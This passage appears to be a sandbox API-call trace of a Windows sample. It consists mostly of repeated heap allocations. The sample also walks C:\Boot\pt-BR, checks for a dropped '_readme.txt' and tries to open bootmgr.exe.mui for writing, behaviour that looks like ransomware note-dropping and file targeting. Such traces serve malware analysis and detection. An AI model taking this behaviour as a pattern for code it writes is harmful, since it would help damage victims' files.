lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.810] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.810] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.810] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.810] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.810] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.810] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.810] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.810] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.810] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.810] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.810] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.810] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.810] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.810] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.810] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.810] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.810] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.810] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.810] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.810] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.810] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.810] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.810] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.811] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.811] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.811] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.811] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.811] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.811] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.811] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.811] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.811] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.811] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.811] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.811] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.811] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.811] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.811] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.811] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.811] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.811] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.811] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.811] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.811] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.811] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.811] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.811] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.811] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.811] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.811] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.811] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.811] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.811] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.811] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.811] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.811] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.811] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.811] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.811] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.811] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.812] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.812] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.812] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.812] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.812] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.812] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.812] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.812] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.812] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.812] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.812] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.812] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.812] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.812] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.812] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.812] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.812] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.812] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.812] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.812] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.812] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.812] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.812] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.812] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.812] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.812] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.812] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.812] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.812] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.812] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.812] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.812] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.812] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.812] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.812] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.812] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.813] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.813] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.813] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.813] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.813] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.813] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.813] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.813] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.813] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.813] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.813] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.813] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.813] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.813] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.813] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.813] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.813] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.813] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.813] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.813] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.813] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.813] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.813] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.813] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.813] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.813] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.813] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.813] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.813] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.813] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.813] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.813] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.813] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.813] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.813] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.813] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.814] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.814] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.814] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.814] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.814] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.814] PathFindFileNameW (pszPath="C:\\Boot\\pt-BR\\") returned="pt-BR\\" [0146.814] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.814] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.814] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0146.814] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.814] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.814] PathFindFileNameW (pszPath="") returned="" [0146.814] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.814] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75f80000 [0146.814] GetProcAddress (hModule=0x75f80000, lpProcName="SHGetFolderPathW") returned 0x76005708 [0146.814] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x800) returned 0x329e270 [0146.814] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x329e270 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0146.814] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x810) returned 0x328f498 [0146.814] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240b68 [0146.814] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.814] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.814] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.814] FreeLibrary (hLibModule=0x75f80000) returned 1 [0146.814] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240b68 | out: hHeap=0x6e0000) returned 1 [0146.815] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.815] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.815] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.815] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x81c) returned 0x328f498 [0146.815] PathAppendW (in: pszPath="C:\\Boot\\pt-BR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\pt-BR\\_readme.txt") returned 1 [0146.815] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.815] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.815] PathFileExistsW (pszPath="C:\\Boot\\pt-BR\\_readme.txt") returned 1 [0146.815] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.815] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.815] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-BR\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ec2a390, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec2a390, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0146.815] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.815] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ec2a390, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec2a390, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0146.815] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0146.815] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.815] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6c28 [0146.815] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.815] PathFindExtensionW (pszPath="C:\\Boot\\pt-BR\\bootmgr.exe.mui") returned=".mui" [0146.815] CreateFileW (lpFileName="C:\\Boot\\pt-BR\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0146.815] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6c28 | out: hHeap=0x6e0000) returned 1 [0146.815] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ec2a390, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ec2a390, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec2a390, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0146.815] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.816] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6c28 [0146.816] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.816] PathFindExtensionW (pszPath="C:\\Boot\\pt-BR\\_readme.txt") returned=".txt" [0146.816] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6c28 | out: hHeap=0x6e0000) returned 1 [0146.816] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ec2a390, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ec2a390, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec2a390, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0146.816] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0146.816] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.816] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240ca8 | out: hHeap=0x6e0000) returned 1 [0146.816] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0146.816] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240ca8 [0146.816] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.816] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.816] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.816] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.816] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.816] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.816] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.816] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.816] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.816] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.816] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.816] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.816] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.816] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.816] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.816] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.816] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.816] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.816] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.816] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.816] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.816] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.816] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.816] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.816] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.817] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.817] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.817] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc2e) returned 0x329e270 [0146.817] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.817] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.817] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.817] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.817] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) 